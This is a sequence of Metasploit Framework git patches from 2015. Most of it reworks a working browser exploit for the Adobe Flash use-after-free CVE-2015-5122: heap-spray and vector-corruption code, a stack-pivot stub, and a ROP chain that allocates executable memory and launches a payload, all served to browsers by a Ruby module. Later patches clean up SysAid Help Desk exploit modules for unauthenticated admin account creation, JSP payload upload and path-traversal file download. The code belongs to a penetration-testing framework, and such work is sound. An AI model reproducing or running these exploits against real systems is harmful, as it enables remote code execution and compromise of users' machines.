         private var eba:ExploitByteArray
         private var payload:ByteArray
         private var platform:String
-        private var op_system:String
         private var pos:uint
         private var byte_array_object:uint
         private var main:uint
         private var stack_object:uint
         private var payload_space_object:uint
         private var buffer_object:uint
+        private var magic:uint
+        private var magic_arg0:uint
+        private var magic_arg1:uint
+        private var magic_object:uint
+        private var magic_table:uint
         private var buffer:uint
         private var vtable:uint
         private var stack_address:uint
         private var payload_address:uint 
+        private var stub_address:uint
+        private var stub_space_object:uint
+        private var stub:Vector.<uint> = new Vector.<uint>(8) 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
         private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
-        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
         {
             exploit = exp
             payload = p
             platform = pl
-            op_system = os
 
             ev = new ExploitVector(uv, uv_length)
             if (!ev.is_ready()) return
@@ -49,9 +55,18 @@ package
             cleanup()
         }
 
+        static function Magic(...a){}
+		
         private function spray_objects():void
         {
             Logger.log("[*] Exploiter - spray_objects()")
+			
+            // mov eax,[esp+0x4]
+            // xchg eax,esp
+            // rets
+            stub[0] = 0x0424448B
+            stub[1] = 0x0000C394
+			
             for (var i:uint = 0; i < spray.length; i++) 
             {
                 spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@@ -59,6 +74,8 @@ package
                 spray[i][1] = exploit 
                 spray[i][2] = stack
                 spray[i][3] = payload_space
+                spray[i][4] = Magic
+                spray[i][5] = stub
             } 
         }
         
@@ -76,6 +93,8 @@ package
             main = ev.at(pos + 1) - 1
             stack_object = ev.at(pos + 2) - 1
             payload_space_object = ev.at(pos + 3) - 1
+            magic = ev.at(pos + 4) - 1
+            stub_space_object = ev.at(pos + 5) - 1
             if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
                 return false
             }
@@ -98,6 +117,11 @@ package
             vtable = ev.read(main)
             stack_address = ev.read(stack_object + 0x18)
             payload_address = ev.read(payload_space_object + 0x18)
+            stub_address = ev.read(stub_space_object + 0x18)
+            magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0)
+            magic_table = ev.read(magic_object)
+            magic_arg0 = ev.read(magic + 0x1c)
+            magic_arg1 = ev.read(magic + 0x20)
         }
         
         private function corrupt_byte_array():void
@@ -138,13 +162,7 @@ package
             if (platform == "linux") {
                 do_rop_linux()
             } else if (platform == "win") {
-                if (op_system == "Windows 8.1") {
-                    do_rop_windows8()
-                } else if (op_system == "Windows 7") {
-                    do_rop_windows()
-                } else {
-                    return
-                }
+                do_rop_windows()
             } else {
                 return
             }
@@ -167,88 +185,20 @@ package
             var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+            eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10
 
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            // Put the fake stack on memory
             eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-            eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
-
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-           
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
-        }
-
-        private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows8()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var advapi32:uint = pe.module("advapi32.dll", flash)
-            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
-            var kernel32:uint = pe.module("kernel32.dll", winmm) 
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
-            var createthread:uint = pe.procedure("CreateThread", kernelbase)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
             eba.write(0, virtualprotect)
-
-            // VirtualProtect
+			
+			// VirtualProtect
             eba.write(0, virtualalloc)
             eba.write(0, buffer + 0x10)
             eba.write(0, 0x1000)
@@ -257,14 +207,14 @@ package
 
             // VirtualAlloc
             eba.write(0, memcpy)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0x4000)
             eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
             eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
 
             // memcpy
             eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, payload_address + 8)
             eba.write(0, payload.length) 
 
@@ -273,13 +223,31 @@ package
             eba.write(0, buffer + 0x10) // return to fix things
             eba.write(0, 0)
             eba.write(0, 0)
-            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x7f6e0000)
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
+			
+            for (var i:uint; i < 0x100; i++) {
+            	eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
+            }
 
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-            exploit.toString() // call method in the fake vtable
+            // VirtualProtect the stub with a *reliable* stackpivot
+            eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stub_address)
+            eba.write(magic + 0x20, 0x10)
+            var args:Array = new Array(0x41)
+            Magic.call.apply(null, args);
+
+            // Call to our stackpivot and init the rop chain
+            eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
+            eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
+            eba.write(magic + 0x1c, stack_address + 0x18000)
+            Magic.call.apply(null, null);
+            eba.write(magic_object, magic_table);
+            eba.write(magic + 0x1c, magic_arg0)
+            eba.write(magic + 0x20, magic_arg1)
         }
 
         private function do_rop_linux():void
diff --git a/external/source/exploits/CVE-2015-5122/Logger.as b/external/source/exploits/CVE-2015-5122/Logger.as
index 61ec768c25..16c0447973 100755
--- a/external/source/exploits/CVE-2015-5122/Logger.as
+++ b/external/source/exploits/CVE-2015-5122/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {
diff --git a/external/source/exploits/CVE-2015-5122/MyClass.as b/external/source/exploits/CVE-2015-5122/MyClass.as
index eabb4998c5..01fda97a58 100755
--- a/external/source/exploits/CVE-2015-5122/MyClass.as
+++ b/external/source/exploits/CVE-2015-5122/MyClass.as
@@ -14,101 +14,108 @@
         static var 
             _gc:Array,
             _ar:Array,
-            _arLen1:int,
-            _arLen2:int,
+            _ar_reuse:Array,
+            _ar_text_line:Array,
             _arLen:int,
+            _ar_reuseLen:int,
+            _ar_text_lineLen:int,
             _vu:Vector.<uint>,
-            _vo:Vector.<Object>,
             _tb:TextBlock,
-            _tl:TextLine,
             _mc:MyClass,
-            _is64 = null,
-            _chrome:Boolean,
-            _done:Boolean,
             _cnt:int,
             _vLen:int,
-            _magic:uint = 0x123456,
             LEN40:uint = 0x40000000;
 		
         static function valueOf2()
         {
             try 
-            {	
-                if (++_cnt < _arLen2) {
-                    // recursive call for next TextLine
-                    _ar[_cnt].opaqueBackground = _mc;
+            {
+                if (++_cnt < _ar_text_lineLen) {
+                    //recursive call for next TextLine
+                    _ar_text_line[_cnt].opaqueBackground = _mc;
                 } else {
-                    Logger.log("MyClass.valueOf2()");
-
-                    // free internal objects
-                    for(var i:int=1; i <= 5; i++)
-                        _tb.recreateTextLine(_ar[_arLen2-i]);
-
+                    for(var i:int = 1; i <= 19; i++)
+                        _tb.recreateTextLine(_ar_text_line[_ar_text_lineLen - i]);
                     // reuse freed memory
-                    for(i=_arLen2; i < _arLen; i++)
-                        _ar[i].length = _vLen;
+                    for(i=0; i < _ar_reuseLen; i++)
+                        _ar_reuse[i].length = _vLen;
                 }
             }
             catch (e:Error)
             {
                 Logger.log("valueOf2 " + e.toString());
             }
+            
             return _vLen+8;
         }
 		
-		static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
+		static function TryExpl(e:Exploit, platform:String, payload:ByteArray, try_number:uint)
 		{
+            if (try_number > 3)
+                return
+            
 			try
 			{
                 // init vars
                 Logger.log("init vars")
-                _arLen1 = 10 * 3; // 10 vectors per page
-                _arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
-                _arLen  = _arLen2 + 10 * 8;
+                _arLen = 30
+                _ar_text_lineLen = 50
+                _ar_reuseLen = 80
+                
                 _ar = new Array(_arLen);
+                _ar_text_line = new Array(_ar_text_lineLen)
+                _ar_reuse = new Array(_ar_reuseLen)
+                
                 if (!_gc) _gc = new Array();
                 _gc.push(_ar);
+                _gc.push(_ar_text_line);
+                _gc.push(_ar_reuse);
+                
                 if (!_tb) {
                     _tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
                     if (!_tb) throw new Error("_tb = " + _tb);
                 }
+                
                 _mc = new MyClass();
+                
                 _vLen = 400/4-2;
-				
                 // fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
                 Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
-                for(var i:int; i < _arLen1; i++) 
-                    _ar[i] = new Vector.<uint>(_vLen);
+                for(var i:uint = 0; i < _arLen; i++) 
+                    _ar[i] = new Vector.<uint>(_vLen)
 				
                 // prepare Vector objects
                 Logger.log("prepare Vector objects")
-                for(i=_arLen2; i < _arLen; i++){
-                    _ar[i] = new Vector.<uint>(8);
-                    _ar[i][0] = i;
+                for(i = 0; i < _ar_reuseLen; i++) {
+                    _ar_reuse[i] = new Vector.<uint>(8);
+                    _ar_reuse[i][0] = i;
+                    _ar_reuse[i][1] = 0xdeedbeef
                 }
 				
                 // prepare TextLines
                 Logger.log("prepare TextLines")
-                for(i=_arLen1; i < _arLen2; i++) 
-                    _ar[i] = _tb.createTextLine();
+                for(i = 0; i < _ar_text_lineLen; i++) 
+                    _ar_text_line[i] = _tb.createTextLine()
+
                 // fill 1016-byte holes (0x38c is a size of internal TextLine object)
                 Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
-                for(i=_arLen1; i < _arLen2; i++) 
-                    _ar[i].opaqueBackground = 1; // alloc 1016 bytes
+                for(i = 0; i < _ar_text_lineLen; i++) 
+                    _ar_text_line[i].opaqueBackground = 1 // alloc 1016 bytes
 
                 // set custom valueOf() for _mc
                 Logger.log("set custom valueOf() for _mc")
-                MyClass.prototype.valueOf = valueOf2;
+                MyClass.prototype.valueOf = valueOf2
 
                 // here we go, call the vulnerable setter
                 Logger.log("here we go, call the vulnerable setter")
-                _cnt = _arLen2-6;
-                _ar[_cnt].opaqueBackground = _mc;
+                //_cnt = _ar_text_lineLen - 6
+                _cnt = _ar_text_lineLen - 20
+                _ar_text_line[_cnt].opaqueBackground = _mc
 
                 // find corrupted vector length 
                 Logger.log("find corrupted vector length ")
-                for(i=_arLen2; i < _arLen; i++) {
-                    _vu = _ar[i];
+                for(i=0; i < _ar_reuseLen; i++) {
+                    _vu = _ar_reuse[i];
                     if (_vu.length > _vLen+2) {
                     	Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
                     	Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
@@ -116,7 +123,7 @@
                     		// corrupt next vector 
                     		_vu[_vLen] = LEN40;
                     		// get corrupted vector
-                    		_vu = _ar[_vu[_vLen+2]]; 
+                    		_vu = _ar_reuse[_vu[_vLen+2]]; 
                     		break;
                     	}
                     };// else CheckCorrupted(_vu, i); // 4RnD
@@ -124,16 +131,17 @@
 
                 // check results
                 Logger.log("v.length = " + _vu.length.toString(16));
+                
                 if (_vu.length < LEN40) throw new Error("try again");
 
-                var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
-
-                // clean up
-                Logger.log("_vu.length = " + _vu.length.toString(16));
+                var exploiter:Exploiter = new Exploiter(e, platform, payload, _vu, 0x62)
 			}
-			catch (e:Error)
+			catch (err:Error)
 			{
-                Logger.log("TryExpl " + e.toString());
+                Logger.log("TryExpl " + err.toString());
+                if (err.toString().indexOf("try again") != -1) {
+                    MyClass.TryExpl(e, platform, payload, try_number + 1)
+                }
 			}
 		}
 		
diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index b4cf3de1e9..8f35bbf391 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
@@ -24,9 +24,10 @@ class Metasploit3 < Msf::Exploit::Remote
         Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
         Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
         Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
-        windows 8.1, Firefox and Adobe Flash 18.0.0.203,
-        Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
-        Windows 8.1, Firefox and Adobe Flash 18.0.0.194
+        Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
+        windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,
+        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and
+        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194
       },
       'License'             => MSF_LICENSE,
       'Author'              =>
@@ -38,7 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'          =>
         [
           ['CVE', '2015-5122'],
-          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-04.html'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-18.html']
         ],
       'Payload'             =>
         {
@@ -93,12 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
-    if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
-      print_warning("Target setup not supported")
-      send_not_found(cli)
-      return
-    end
-
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
@@ -113,20 +110,16 @@ class Metasploit3 < Msf::Exploit::Remote
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
-    os_name = target_info[:os_name]
-
-    if target.name =~ /Windows/
-      platform_id = 'win'
-    end
+    platform_id = 'win'
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
     </object>
     </body>
     </html>

From ae1815a17175e4ad1105f250051aa4494564ad93 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 16:00:04 -0500
Subject: [PATCH 0813/1013] Resolve #5743, Add --help-platforms for msfvenom

Resolve #5743
---
 msfvenom | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/msfvenom b/msfvenom
index 84b71ab4b9..25e3af7a47 100755
--- a/msfvenom
+++ b/msfvenom
@@ -110,6 +110,15 @@ require 'msf/core/payload_generator'
       opts[:platform] = l
     end
 
+    opt.on('--help-platforms', String, 'List available platforms') do
+      init_framework(:module_types => [])
+      supported_platforms = []
+      Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"}
+      msg = "Platforms\n" +
+            "\t" + supported_platforms * ", "
+      raise UsageError, msg
+    end
+
     opt.on('-s', '--space         <length>', Integer, 'The maximum size of the resulting payload') do |s|
       opts[:space] = s
     end

From ca38fc55181fa53429a154d93bdf5108a0206dd2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 11:08:28 -0500
Subject: [PATCH 0814/1013] Update description

---
 modules/auxiliary/admin/http/sysaid_admin_acct.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
index 2b373dee5e..7b753f52b9 100644
--- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb
+++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
@@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name' => 'SysAid Help Desk Administrator Account Creation',
       'Description' => %q{
-        This module exploits a vulnerability in SysAid Help Desk that allows an
-        unauthenticated user to create an administrator account. Note that this
-        exploit will only work once! Any subsequent attempts will fail.
-        This module has been tested on SysAid 14.4 in Windows and Linux.
+        This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
+        user to create an administrator account. Note that this exploit will only work once. Any
+        subsequent attempts will fail. On the other hand, the credentials must be verified
+        manually. This module has been tested on SysAid 14.4 in Windows and Linux.
         },
       'Author' =>
         [
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
     })
     if res && res.code == 200 && res.body.to_s =~ /Error while creating account/
       # No way to know whether this worked or not, it always says error
-      print_good("#{peer} - Created administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually")
       service_data = {
         address: rhost,
         port: rport,

From 309a86ec574043002ac5814cedfb30a5f0903e0e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 11:26:54 -0500
Subject: [PATCH 0815/1013] Do code cleanup

---
 .../multi/http/sysaid_auth_file_upload.rb     | 57 ++++++++-----------
 1 file changed, 23 insertions(+), 34 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
index 7424cdd581..531866c887 100644
--- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@@ -25,31 +25,30 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'       =>
         [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', '2015-2994' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
+          ['CVE', '2015-2994'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
         ],
       'DefaultOptions' => { 'WfsDelay' => 5 },
       'Privileged'  => false,
       'Platform'    => %w{ linux win },
+      'Arch' => ARCH_X86,
       'Targets'     =>
         [
           [ 'Automatic', { } ],
           [ 'SysAid Help Desk v14.4 / Linux',
             {
-              'Platform' => 'linux',
-              'Arch' => ARCH_X86
+              'Platform' => 'linux'
             }
           ],
           [ 'SysAid Help Desk v14.4 / Windows',
             {
-              'Platform' => 'win',
-              'Arch' => ARCH_X86
+              'Platform' => 'win'
             }
           ]
         ],
@@ -94,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'password' => datastore['PASSWORD']
       }
     })
+
     if res && res.code == 302 && res.get_cookies
       return res.get_cookies
     else
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_payload(payload, is_exploit)
     post_data = Rex::MIME::Message.new
     post_data.add_part(payload,
-      "application/octet-stream", 'binary',
+      'application/octet-stream', 'binary',
       "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(8))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(10))}.jsp\"")
 
     data = post_data.to_s
@@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if is_exploit
       print_status("#{peer} - Uploading payload...")
     end
+
     res = send_request_cgi({
       'uri'    => normalize_uri(datastore['TARGETURI'], 'ChangePhoto.jsp'),
       'method' => 'POST',
@@ -126,15 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote
       if is_exploit
         print_status("#{peer} - Payload uploaded successfully")
       end
+
       return $1
     else
       return nil
     end
   end
 
-
   def pick_target
-    return target if target.name != 'Automatic'
+    unless target.name == 'Automatic'
+      return target
+    end
 
     print_status("#{peer} - Determining target")
     os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
@@ -157,13 +160,11 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    return nil
+    nil
   end
 
-
   def generate_jsp_payload
     opts = {:arch => @my_target.arch, :platform => @my_target.platform}
-    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     exe = generate_payload_exe(opts)
     base64_exe = Rex::Text.encode_base64(exe)
 
@@ -221,36 +222,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
     jsp = jsp.gsub(/\n/, '')
     jsp = jsp.gsub(/\t/, '')
-    jsp = jsp.gsub(/\x0d\x0a/, "")
-    jsp = jsp.gsub(/\x0a/, "")
+    jsp = jsp.gsub(/\x0d\x0a/, '')
+    jsp = jsp.gsub(/\x0a/, '')
 
     return jsp
   end
 
-
-  def exploit_native
-
-
-    return jsp_name
-  end
-
-
   def exploit
     @cookie = authenticate
-    if not @cookie
-      print_error("#{peer} - Unable to authenticate with the provided credentials.")
-      return
-    else
-      print_status("#{peer} - Authentication was successful with the provided credentials.")
+    unless @cookie
+      fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.")
     end
+    print_status("#{peer} - Authentication was successful with the provided credentials.")
 
     @my_target = pick_target
     if @my_target.nil?
-      print_error("#{peer} - Unable to select a target, we must bail.")
-      return
-    else
-      print_status("#{peer} - Selected target #{@my_target.name}")
+      fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
     end
+    print_status("#{peer} - Selected target #{@my_target.name}")
 
     # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
     # Fail if this is the case and ask the user to select an appropriate payload.
@@ -260,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     jsp_payload = generate_jsp_payload
     jsp_path = upload_payload(jsp_payload, true)
-    if not jsp_path
+    unless jsp_path
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 

From 9ac1688eb1f916fcac826f6cf486c4a06b1713c2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Jul 2015 11:45:28 -0500
Subject: [PATCH 0816/1013] Do code cleanup

---
 .../admin/http/sysaid_file_download.rb        | 66 ++++++++-----------
 1 file changed, 29 insertions(+), 37 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb
index a5ba1dc7b7..42f76e694e 100644
--- a/modules/auxiliary/admin/http/sysaid_file_download.rb
+++ b/modules/auxiliary/admin/http/sysaid_file_download.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "SysAid Help Desk Arbitrary File Download",
+      'Name'           => 'SysAid Help Desk Arbitrary File Download',
       'Description' => %q{
         This module exploits two vulnerabilities in SysAid Help Desk that allows
         an unauthenticated user to download arbitrary files from the system. First an
@@ -30,10 +30,10 @@ class Metasploit3 < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References' =>
         [
-          [ 'CVE', '2015-2996' ],
-          [ 'CVE', '2015-2997' ],
-          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
+          ['CVE', '2015-2996'],
+          ['CVE', '2015-2997'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 
@@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
-
   def get_traversal_path
     print_status("#{peer} - Trying to find out the traversal path...")
     large_traversal = '../' * rand(15...30)
@@ -63,21 +62,18 @@ class Metasploit3 < Msf::Auxiliary
       }
     })
 
-    if res && res.code == 200
-      if res.body.to_s =~ /\<H2\>(.*)\<\/H2\>/
-        error_path = $1
-        # Error_path is something like:
-        # /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
-        # This calculates how much traversal we need to do to get to the root.
-        position = error_path.index(large_traversal)
-        if position != nil
-          return "../" * (error_path[0,position].count('/') - 2)
-        end
+    if res && res.code == 200 && res.body.to_s =~ /\<H2\>(.*)\<\/H2\>/
+      error_path = $1
+      # Error_path is something like:
